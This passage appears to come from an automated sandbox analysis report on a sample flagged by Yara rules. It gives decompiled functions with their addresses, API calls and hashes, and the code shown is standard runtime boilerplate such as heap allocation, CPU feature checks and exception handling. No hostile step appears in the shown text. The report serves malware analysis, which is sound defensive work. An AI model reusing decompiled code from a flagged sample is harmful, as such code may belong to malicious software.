                                                                    • Opcode ID: 060aa7053acf556b93056d40afe3d2a4a8ddd9aae74d8bebeb0beeb8417ee5ee
                                                                    • Instruction ID: e1ffc0a1c1a4d9c60ba63a2b3d6c0bb581dd470f6d51773805e4de56b79455e5
                                                                    • Opcode Fuzzy Hash: 060aa7053acf556b93056d40afe3d2a4a8ddd9aae74d8bebeb0beeb8417ee5ee
                                                                    • Instruction Fuzzy Hash: C6F03C74A01304EBE6306BE18ECDF1B7A9CAF84789F050134FA01B62A0DA748C00C679
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00401E1D, Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E00401E1D() {
				_Unknown_base(*)()* _t1;

				_t1 = SetUnhandledExceptionFilter(E00401E29); // executed
				return _t1;
			}




                                                                    0x00401e22
                                                                    0x00401e28

                                                                    APIs
                                                                    • SetUnhandledExceptionFilter.KERNELBASE(Function_00001E29,00401716), ref: 00401E22
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.497023091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ExceptionFilterUnhandled
                                                                    • String ID:
                                                                    • API String ID: 3192549508-0
                                                                    • Opcode ID: f10ce909f55bf21439a7486d1ee2c3bdf37a7dd0004178b465455f206acc9e88
                                                                    • Instruction ID: 98c1414349b9c6d47e2858da2eafac41ced4a749a9169aad70cadcfed52b35c5
                                                                    • Opcode Fuzzy Hash: f10ce909f55bf21439a7486d1ee2c3bdf37a7dd0004178b465455f206acc9e88
                                                                    • Instruction Fuzzy Hash:
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 004055C5, Relevance: 3.0, APIs: 2, Instructions: 37COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E004055C5(void* __ecx) {
				void* _t6;
				void* _t14;
				void* _t18;
				WCHAR* _t19;

				_t14 = __ecx;
				_t19 = GetEnvironmentStringsW();
				if(_t19 != 0) {
					_t12 = (E0040558E(_t19) - _t19 >> 1) + (E0040558E(_t19) - _t19 >> 1);
					_t6 = E00403E3D(_t14, (E0040558E(_t19) - _t19 >> 1) + (E0040558E(_t19) - _t19 >> 1)); // executed
					_t18 = _t6;
					if(_t18 != 0) {
						E0040ACF0(_t18, _t19, _t12);
					}
					E00403E03(0);
					FreeEnvironmentStringsW(_t19);
				} else {
					_t18 = 0;
				}
				return _t18;
			}







                                                                    0x004055c5
                                                                    0x004055cf
                                                                    0x004055d3
                                                                    0x004055e4
                                                                    0x004055e8
                                                                    0x004055ed
                                                                    0x004055f3
                                                                    0x004055f8
                                                                    0x004055fd
                                                                    0x00405602
                                                                    0x00405609
                                                                    0x004055d5
                                                                    0x004055d5
                                                                    0x004055d5
                                                                    0x00405614

                                                                    APIs
                                                                    • GetEnvironmentStringsW.KERNEL32 ref: 004055C9
                                                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00405609
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000001.237777605.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000001.00000001.237862989.0000000000414000.00000040.00020000.sdmp Download File
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: EnvironmentStrings$Free
                                                                    • String ID:
                                                                    • API String ID: 3328510275-0
                                                                    • Opcode ID: 8cd0ade3987da643afe372fdbc3b04457b893c98baeb1de225cc927f8a7ffae8
                                                                    • Instruction ID: c5c85d496f4b9afafe33008ffa5735024e7f647e2ae8fec8aafe46d04be69a25
                                                                    • Opcode Fuzzy Hash: 8cd0ade3987da643afe372fdbc3b04457b893c98baeb1de225cc927f8a7ffae8
                                                                    • Instruction Fuzzy Hash: E7E0E5371049206BD22127267C8AA6B2A1DCFC17B5765063BF809B61C2AE3D8E0208FD
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00793640, Relevance: 1.6, APIs: 1, Instructions: 149COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.500554682.0000000000790000.00000040.00000001.sdmp, Offset: 00780000, based on PE: true
                                                                    • Associated: 00000001.00000002.500528462.0000000000780000.00000004.00000001.sdmp Download File
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 7b17a01283d51657bf3f39f1e01e9c22bd757ba1ef0eed8d19e362b0fff32e11
                                                                    • Instruction ID: 08f4845f696d2c71b12a9460d352056987ce8616acae9cf5f96e53605c312593
                                                                    • Opcode Fuzzy Hash: 7b17a01283d51657bf3f39f1e01e9c22bd757ba1ef0eed8d19e362b0fff32e11
                                                                    • Instruction Fuzzy Hash: 7E51B071D012099FCF10DFA9E9456EEBBB4EF48310F10816AE858E7341E7345A08CBA2
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 007904C0, Relevance: 1.6, APIs: 1, Instructions: 61timeCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetSystemTimes.KERNELBASE(?,?,?), ref: 00793A8C
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.500554682.0000000000790000.00000040.00000001.sdmp, Offset: 00780000, based on PE: true
                                                                    • Associated: 00000001.00000002.500528462.0000000000780000.00000004.00000001.sdmp Download File
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: SystemTimes
                                                                    • String ID:
                                                                    • API String ID: 375623090-0
                                                                    • Opcode ID: d57dbba4c078690307b936b81cab6e88437c43ebb62a40a48417b664161541ca
                                                                    • Instruction ID: 307d8a9e6ea76e130da4dd84f541fa6bccbfd8770319ef0ef7f01590e1026b4b
                                                                    • Opcode Fuzzy Hash: d57dbba4c078690307b936b81cab6e88437c43ebb62a40a48417b664161541ca
                                                                    • Instruction Fuzzy Hash: CF21D3B1D012199FCB50CFA9D584BDEFBF4EF48310F14806AE818AB341E7789A44CBA5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00403E3D, Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 94%
                                                                    			E00403E3D(void* __ecx, long _a4) {
				void* _t4;
				void* _t6;
				void* _t7;
				long _t8;

				_t7 = __ecx;
				_t8 = _a4;
				if(_t8 > 0xffffffe0) {
					L7:
					 *((intOrPtr*)(E00404831())) = 0xc;
					__eflags = 0;
					return 0;
				}
				if(_t8 == 0) {
					_t8 = _t8 + 1;
				}
				while(1) {
					_t4 = RtlAllocateHeap( *0x4132b0, 0, _t8); // executed
					if(_t4 != 0) {
						break;
					}
					__eflags = E00403829();
					if(__eflags == 0) {
						goto L7;
					}
					_t6 = E004068FD(_t7, __eflags, _t8);
					_pop(_t7);
					__eflags = _t6;
					if(_t6 == 0) {
						goto L7;
					}
				}
				return _t4;
			}







                                                                    0x00403e3d
                                                                    0x00403e43
                                                                    0x00403e49
                                                                    0x00403e7b
                                                                    0x00403e80
                                                                    0x00403e86
                                                                    0x00000000
                                                                    0x00403e86
                                                                    0x00403e4d
                                                                    0x00403e4f
                                                                    0x00403e4f
                                                                    0x00403e66
                                                                    0x00403e6f
                                                                    0x00403e77
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00403e57
                                                                    0x00403e59
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00403e5c
                                                                    0x00403e61
                                                                    0x00403e62
                                                                    0x00403e64
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00403e64
                                                                    0x00000000

                                                                    APIs
                                                                    • RtlAllocateHeap.NTDLL(00000000,?,00000004,?,00407C67,?,00000000,?,004067DA,?,00000004,?,?,?,?,00403B03), ref: 00403E6F
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000001.237777605.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000001.00000001.237862989.0000000000414000.00000040.00020000.sdmp Download File
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AllocateHeap
                                                                    • String ID:
                                                                    • API String ID: 1279760036-0
                                                                    • Opcode ID: a4c9c6b9c171d7e3068f9dcb93680387a8cae48819217d3cebbdef174e207782
                                                                    • Instruction ID: 2c5ed35c3885d6f2518923907421e71a1374dda36297243b1d9f5d3b1e0eb56a
                                                                    • Opcode Fuzzy Hash: a4c9c6b9c171d7e3068f9dcb93680387a8cae48819217d3cebbdef174e207782
                                                                    • Instruction Fuzzy Hash: 54E03922505222A6D6213F6ADC04F5B7E4C9F817A2F158777AD15B62D0CB389F0181ED
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0090D2E8, Relevance: .1, Instructions: 76COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.500727822.000000000090D000.00000040.00000001.sdmp, Offset: 0090D000, based on PE: false
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: c58dc5ad0691ddbb637f17cb3bc4e22773b622fa75f356b1eb2a228eb5e2ff27
                                                                    • Instruction ID: 83e3073bb854b0f2d2566c7a3e52fbf2b518caeaa32995875f01c35bb875b972
                                                                    • Opcode Fuzzy Hash: c58dc5ad0691ddbb637f17cb3bc4e22773b622fa75f356b1eb2a228eb5e2ff27
                                                                    • Instruction Fuzzy Hash: 4421F871504240EFDF15CF54D8C0B5ABB69FB84318F24C969E8050B786C33AD856DBA2
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0090D5B0, Relevance: .1, Instructions: 75COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.500727822.000000000090D000.00000040.00000001.sdmp, Offset: 0090D000, based on PE: false
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 13bdc0c89555143cc5dd9a115c01d87bee8f316089e3ea8b302d091f6c933229
                                                                    • Instruction ID: 94a0ea3957992b427f50daed5af802b74789180628bebbb39b3a29e0be8aed9f
                                                                    • Opcode Fuzzy Hash: 13bdc0c89555143cc5dd9a115c01d87bee8f316089e3ea8b302d091f6c933229
                                                                    • Instruction Fuzzy Hash: FC210371504240EFCF04CF50D8C0B66BF69FB98324F208969E8090B68AC33AD845DBA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0091D1D4, Relevance: .1, Instructions: 72COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.500765526.000000000091D000.00000040.00000001.sdmp, Offset: 0091D000, based on PE: false
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: b84818eaa022906385b32fbc79553f9e13527adb55c3591f16c085481cf36dfb
                                                                    • Instruction ID: 967aa93ad99569a988a826177e69a5b01af4148787db1382d06a12638e566c9e
                                                                    • Opcode Fuzzy Hash: b84818eaa022906385b32fbc79553f9e13527adb55c3591f16c085481cf36dfb
                                                                    • Instruction Fuzzy Hash: 1B21B371604248AFDB05CF14D9C0B96BBA5FB84314F24CE6DD8694B755C33AD886CAA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0091D01C, Relevance: .1, Instructions: 72COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.500765526.000000000091D000.00000040.00000001.sdmp, Offset: 0091D000, based on PE: false
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 73d7270154aff72113de69192768315dc6d3958d51a8e9ee502de93a45ae35b2
                                                                    • Instruction ID: 6990aac0274b771921880035d0d319868b32539f78f6c28397306e8b6d5a42ca
                                                                    • Opcode Fuzzy Hash: 73d7270154aff72113de69192768315dc6d3958d51a8e9ee502de93a45ae35b2
                                                                    • Instruction Fuzzy Hash: 4021C275604248EFDB14CF24D9C4BA6BB69FB88314F24C96DD8494B746C33AD886CAA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0091D006, Relevance: .1, Instructions: 62COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.500765526.000000000091D000.00000040.00000001.sdmp, Offset: 0091D000, based on PE: false
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 2b7a585a6ef22d4a4270149f1dfe861dfa0e7e6a9417539e36edf0ff2c68716e
                                                                    • Instruction ID: 319b1cdb8d5e9faae1a6176e57c46151fe7e181a733d345eb9c6ae3992d5e1f2
                                                                    • Opcode Fuzzy Hash: 2b7a585a6ef22d4a4270149f1dfe861dfa0e7e6a9417539e36edf0ff2c68716e
                                                                    • Instruction Fuzzy Hash: E72180755093C48FDB02CF24D990755BF71EB46314F28C5EAD8498B697C33AD84ACB62
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0090D2E3, Relevance: .1, Instructions: 57COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.500727822.000000000090D000.00000040.00000001.sdmp, Offset: 0090D000, based on PE: false
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: f577c0d785620053450ac6b5f88a74b336517c772b60918f743648fc63ace247
                                                                    • Instruction ID: 6c220d4199e8a4cc706c988eb35fccff1b75dac17f350481781999cabbb4ce9e
                                                                    • Opcode Fuzzy Hash: f577c0d785620053450ac6b5f88a74b336517c772b60918f743648fc63ace247
                                                                    • Instruction Fuzzy Hash: 8421AF76504280DFCB16CF54D9C4B5ABF72FB84314F24C6AAD8484B656C33AD826CBA2
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0090D5AB, Relevance: .1, Instructions: 56COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.500727822.000000000090D000.00000040.00000001.sdmp, Offset: 0090D000, based on PE: false
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 8d30635df11a0a4441337c1596a288a2e76eda72e03be72d2606ef8ea09213f5
                                                                    • Instruction ID: a0ef57d45de4d37fd088c93559a60c38d762ced616fd697220142281877cc5f3
                                                                    • Opcode Fuzzy Hash: 8d30635df11a0a4441337c1596a288a2e76eda72e03be72d2606ef8ea09213f5
                                                                    • Instruction Fuzzy Hash: 2B11D376404280DFCF11CF50D9C4B16BF72FB94324F24C6A9D8094B656C336D856CBA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0091D1CF, Relevance: .1, Instructions: 53COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.500765526.000000000091D000.00000040.00000001.sdmp, Offset: 0091D000, based on PE: false
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 368b5f16432069a8443523713166230eae48744dfbf47c59ed69e4d46d149b90
                                                                    • Instruction ID: 775a70551647ac7228b8bedc4dd6a18d905952d87983f58bc985d60d8184796a
                                                                    • Opcode Fuzzy Hash: 368b5f16432069a8443523713166230eae48744dfbf47c59ed69e4d46d149b90
                                                                    • Instruction Fuzzy Hash: E111DD75A04284DFDB01CF10D5C0B55FBB1FB84314F24CAAED8594B656C33AD84ACB61
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0090D01D, Relevance: .0, Instructions: 45COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.500727822.000000000090D000.00000040.00000001.sdmp, Offset: 0090D000, based on PE: false
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 6cc6c061bfb4a61d591a590e04fc2ee1fe850d855a24d14d0e84e8ecd70c85d6
                                                                    • Instruction ID: e358c13ad18a46d6b588b021566d371b5cf1c0e594d4e5883498103de740367c
                                                                    • Opcode Fuzzy Hash: 6cc6c061bfb4a61d591a590e04fc2ee1fe850d855a24d14d0e84e8ecd70c85d6
                                                                    • Instruction Fuzzy Hash: 9F01F771506380AEE7108E65CC847A6FBACEF41364F18841AED4C5B7C2C7799845C6B1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0090D01C, Relevance: .0, Instructions: 36COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.500727822.000000000090D000.00000040.00000001.sdmp, Offset: 0090D000, based on PE: false
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: d1185ec3bd63351764da3c6963864d4d2316557925a642d7becf3f6190d7d5b8
                                                                    • Instruction ID: 5f80b0a5bec62811d0420754793d50cb8161c3b15e119f3c89631ace3290425f
                                                                    • Opcode Fuzzy Hash: d1185ec3bd63351764da3c6963864d4d2316557925a642d7becf3f6190d7d5b8
                                                                    • Instruction Fuzzy Hash: 84F0CD71405284AEEB108E16CC84BA2FBACEB41324F18C45AED4C5B282C379A844CAB0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Non-executed Functions

                                                                    Function 0040446F, Relevance: 4.6, APIs: 3, Instructions: 78COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 74%
                                                                    			E0040446F(intOrPtr __ebx, intOrPtr __edx, intOrPtr __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v0;
				signed int _v8;
				intOrPtr _v524;
				intOrPtr _v528;
				void* _v532;
				intOrPtr _v536;
				char _v540;
				intOrPtr _v544;
				intOrPtr _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				intOrPtr _v564;
				intOrPtr _v568;
				intOrPtr _v572;
				intOrPtr _v576;
				intOrPtr _v580;
				intOrPtr _v584;
				char _v724;
				intOrPtr _v792;
				intOrPtr _v800;
				char _v804;
				struct _EXCEPTION_POINTERS _v812;
				void* __edi;
				signed int _t40;
				char* _t47;
				char* _t49;
				long _t57;
				intOrPtr _t59;
				intOrPtr _t60;
				intOrPtr _t64;
				intOrPtr _t65;
				int _t66;
				intOrPtr _t68;
				signed int _t69;

				_t68 = __esi;
				_t64 = __edx;
				_t59 = __ebx;
				_t40 =  *0x412014; // 0x920e2052
				_t41 = _t40 ^ _t69;
				_v8 = _t40 ^ _t69;
				_push(_t65);
				if(_a4 != 0xffffffff) {
					_push(_a4);
					E00401E6A(_t41);
					_pop(_t60);
				}
				E00402460(_t65,  &_v804, 0, 0x50);
				E00402460(_t65,  &_v724, 0, 0x2cc);
				_v812.ExceptionRecord =  &_v804;
				_t47 =  &_v724;
				_v812.ContextRecord = _t47;
				_v548 = _t47;
				_v552 = _t60;
				_v556 = _t64;
				_v560 = _t59;
				_v564 = _t68;
				_v568 = _t65;
				_v524 = ss;
				_v536 = cs;
				_v572 = ds;
				_v576 = es;
				_v580 = fs;
				_v584 = gs;
				asm("pushfd");
				_pop( *_t22);
				_v540 = _v0;
				_t49 =  &_v0;
				_v528 = _t49;
				_v724 = 0x10001;
				_v544 =  *((intOrPtr*)(_t49 - 4));
				_v804 = _a8;
				_v800 = _a12;
				_v792 = _v0;
				_t66 = IsDebuggerPresent();
				SetUnhandledExceptionFilter(0);
				_t57 = UnhandledExceptionFilter( &_v812);
				if(_t57 == 0 && _t66 == 0 && _a4 != 0xffffffff) {
					_push(_a4);
					_t57 = E00401E6A(_t57);
				}
				E004018CC();
				return _t57;
			}






































                                                                    0x0040446f
                                                                    0x0040446f
                                                                    0x0040446f
                                                                    0x0040447a
                                                                    0x0040447f
                                                                    0x00404481
                                                                    0x00404488
                                                                    0x00404489
                                                                    0x0040448b
                                                                    0x0040448e
                                                                    0x00404493
                                                                    0x00404493
                                                                    0x0040449f
                                                                    0x004044b2
                                                                    0x004044c0
                                                                    0x004044c6
                                                                    0x004044cc
                                                                    0x004044d2
                                                                    0x004044d8
                                                                    0x004044de
                                                                    0x004044e4
                                                                    0x004044ea
                                                                    0x004044f0
                                                                    0x004044f6
                                                                    0x004044fd
                                                                    0x00404504
                                                                    0x0040450b
                                                                    0x00404512
                                                                    0x00404519
                                                                    0x00404520
                                                                    0x00404521
                                                                    0x0040452a
                                                                    0x00404530
                                                                    0x00404533
                                                                    0x00404539
                                                                    0x00404546
                                                                    0x0040454f
                                                                    0x00404558
                                                                    0x00404561
                                                                    0x0040456f
                                                                    0x00404571
                                                                    0x0040457e
                                                                    0x00404586
                                                                    0x00404592
                                                                    0x00404595
                                                                    0x0040459a
                                                                    0x004045a1
                                                                    0x004045a9

                                                                    APIs
                                                                    • IsDebuggerPresent.KERNEL32 ref: 00404567
                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00404571
                                                                    • UnhandledExceptionFilter.KERNEL32(?), ref: 0040457E
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.497023091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                    • String ID:
                                                                    • API String ID: 3906539128-0
                                                                    • Opcode ID: 2ea22a54f0bb21e3e7ef13a2463ede0b165cda552ac7540fe10d04093127767f
                                                                    • Instruction ID: 1195a769eb9e4d04bd79abb1e2ff1cfbb043d98aa737aaf25acc392e7af51fe4
                                                                    • Opcode Fuzzy Hash: 2ea22a54f0bb21e3e7ef13a2463ede0b165cda552ac7540fe10d04093127767f
                                                                    • Instruction Fuzzy Hash: 5931C674901218EBCB21DF64DD8878DB7B4BF48310F5042EAE50CA7290E7749F858F49
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0040208D, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 134COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 86%
                                                                    			E0040208D(intOrPtr __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed char _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _t59;
				signed int _t62;
				signed int _t63;
				intOrPtr _t65;
				signed int _t66;
				signed int _t68;
				intOrPtr _t73;
				intOrPtr* _t75;
				intOrPtr* _t77;
				intOrPtr _t84;
				intOrPtr* _t86;
				signed int _t91;
				signed int _t94;

				_t84 = __edx;
				 *0x412b2c =  *0x412b2c & 0x00000000;
				 *0x412030 =  *0x412030 | 1;
				if(IsProcessorFeaturePresent(0xa) == 0) {
					L20:
					return 0;
				}
				_v24 = _v24 & 0x00000000;
				 *0x412030 =  *0x412030 | 0x00000002;
				 *0x412b2c = 1;
				_t86 =  &_v48;
				_push(1);
				asm("cpuid");
				_pop(_t73);
				 *_t86 = 0;
				 *((intOrPtr*)(_t86 + 4)) = 1;
				 *((intOrPtr*)(_t86 + 8)) = 0;
				 *((intOrPtr*)(_t86 + 0xc)) = _t84;
				_v16 = _v48;
				_v8 = _v36 ^ 0x49656e69;
				_v12 = _v40 ^ 0x6c65746e;
				_push(1);
				asm("cpuid");
				_t75 =  &_v48;
				 *_t75 = 1;
				 *((intOrPtr*)(_t75 + 4)) = _t73;
				 *((intOrPtr*)(_t75 + 8)) = 0;
				 *((intOrPtr*)(_t75 + 0xc)) = _t84;
				if((_v44 ^ 0x756e6547 | _v8 | _v12) != 0) {
					L9:
					_t91 =  *0x412b30; // 0x2
					L10:
					_v32 = _v36;
					_t59 = _v40;
					_v8 = _t59;
					_v28 = _t59;
					if(_v16 >= 7) {
						_t65 = 7;
						_push(_t75);
						asm("cpuid");
						_t77 =  &_v48;
						 *_t77 = _t65;
						 *((intOrPtr*)(_t77 + 4)) = _t75;
						 *((intOrPtr*)(_t77 + 8)) = 0;
						 *((intOrPtr*)(_t77 + 0xc)) = _t84;
						_t66 = _v44;
						_v24 = _t66;
						_t59 = _v8;
						if((_t66 & 0x00000200) != 0) {
							 *0x412b30 = _t91 | 0x00000002;
						}
					}
					if((_t59 & 0x00100000) != 0) {
						 *0x412030 =  *0x412030 | 0x00000004;
						 *0x412b2c = 2;
						if((_t59 & 0x08000000) != 0 && (_t59 & 0x10000000) != 0) {
							asm("xgetbv");
							_v20 = _t59;
							_v16 = _t84;
							if((_v20 & 0x00000006) == 6 && 0 == 0) {
								_t62 =  *0x412030; // 0x2f
								_t63 = _t62 | 0x00000008;
								 *0x412b2c = 3;
								 *0x412030 = _t63;
								if((_v24 & 0x00000020) != 0) {
									 *0x412b2c = 5;
									 *0x412030 = _t63 | 0x00000020;
								}
							}
						}
					}
					goto L20;
				}
				_t68 = _v48 & 0x0fff3ff0;
				if(_t68 == 0x106c0 || _t68 == 0x20660 || _t68 == 0x20670 || _t68 == 0x30650 || _t68 == 0x30660 || _t68 == 0x30670) {
					_t94 =  *0x412b30; // 0x2
					_t91 = _t94 | 0x00000001;
					 *0x412b30 = _t91;
					goto L10;
				} else {
					goto L9;
				}
			}



























                                                                    0x0040208d
                                                                    0x00402090
                                                                    0x0040209e
                                                                    0x004020ad
                                                                    0x0040222a
                                                                    0x00402230
                                                                    0x00402230
                                                                    0x004020b3
                                                                    0x004020b9
                                                                    0x004020c4
                                                                    0x004020ca
                                                                    0x004020cd
                                                                    0x004020ce
                                                                    0x004020d2
                                                                    0x004020d3
                                                                    0x004020d5
                                                                    0x004020d8
                                                                    0x004020dd
                                                                    0x004020e6
                                                                    0x004020f7
                                                                    0x00402102
                                                                    0x00402108
                                                                    0x00402109
                                                                    0x00402111
                                                                    0x00402117
                                                                    0x00402119
                                                                    0x0040211c
                                                                    0x0040211f
                                                                    0x00402122
                                                                    0x00402167
                                                                    0x00402167
                                                                    0x0040216d
                                                                    0x00402174
                                                                    0x00402177
                                                                    0x0040217a
                                                                    0x0040217d
                                                                    0x00402180
                                                                    0x00402184
                                                                    0x00402187
                                                                    0x00402188
                                                                    0x0040218d
                                                                    0x00402190
                                                                    0x00402192
                                                                    0x00402195
                                                                    0x00402198
                                                                    0x0040219b
                                                                    0x004021a3
                                                                    0x004021a6
                                                                    0x004021a9
                                                                    0x004021ae
                                                                    0x004021ae
                                                                    0x004021a9
                                                                    0x004021bb
                                                                    0x004021bd
                                                                    0x004021c4
                                                                    0x004021d3
                                                                    0x004021de
                                                                    0x004021e1
                                                                    0x004021e4
                                                                    0x004021f5
                                                                    0x004021fb
                                                                    0x00402200
                                                                    0x00402203
                                                                    0x00402211
                                                                    0x00402216
                                                                    0x0040221b
                                                                    0x00402225
                                                                    0x00402225
                                                                    0x00402216
                                                                    0x004021f5
                                                                    0x004021d3
                                                                    0x00000000
                                                                    0x004021bb
                                                                    0x00402127
                                                                    0x00402131
                                                                    0x00402156
                                                                    0x0040215c
                                                                    0x0040215f
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000

                                                                    APIs
                                                                    • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 004020A6
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.497023091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: FeaturePresentProcessor
                                                                    • String ID:
                                                                    • API String ID: 2325560087-3916222277
                                                                    • Opcode ID: b5824543732270ab0b84e6c6534a0c658c0f0c8495c1d5a659de4557b6608cfa
                                                                    • Instruction ID: 00a0b3a4e6e1703bd72bf57860e68eebd2cbb95fa7def28fde3004e4e54fdf29
                                                                    • Opcode Fuzzy Hash: b5824543732270ab0b84e6c6534a0c658c0f0c8495c1d5a659de4557b6608cfa
                                                                    • Instruction Fuzzy Hash: 02515AB19102099BDB15CFA9DA8979ABBF4FB08314F14C57AD804EB390D3B8A915CF58
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 004067FE, Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E004067FE() {
				signed int _t3;

				_t3 = GetProcessHeap();
				 *0x4132b0 = _t3;
				return _t3 & 0xffffff00 | _t3 != 0x00000000;
			}




                                                                    0x004067fe
                                                                    0x00406806
                                                                    0x0040680e

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.497023091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: HeapProcess
                                                                    • String ID:
                                                                    • API String ID: 54951025-0
                                                                    • Opcode ID: 4abe4d7e697a5e334cba9e91fa50753fcf89eadab84e16c7efba8372fc9c1de6
                                                                    • Instruction ID: ab0ad82ebdde72e163074a118323e5abeae2aeda4b6cf9790db401cd62e62c3c
                                                                    • Opcode Fuzzy Hash: 4abe4d7e697a5e334cba9e91fa50753fcf89eadab84e16c7efba8372fc9c1de6
                                                                    • Instruction Fuzzy Hash: F7A011B0200200CBC3008F38AA8820A3AA8AA08282308C2B8A008C00A0EB388088AA08
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 004078CF, Relevance: 12.2, APIs: 8, Instructions: 216COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 70%
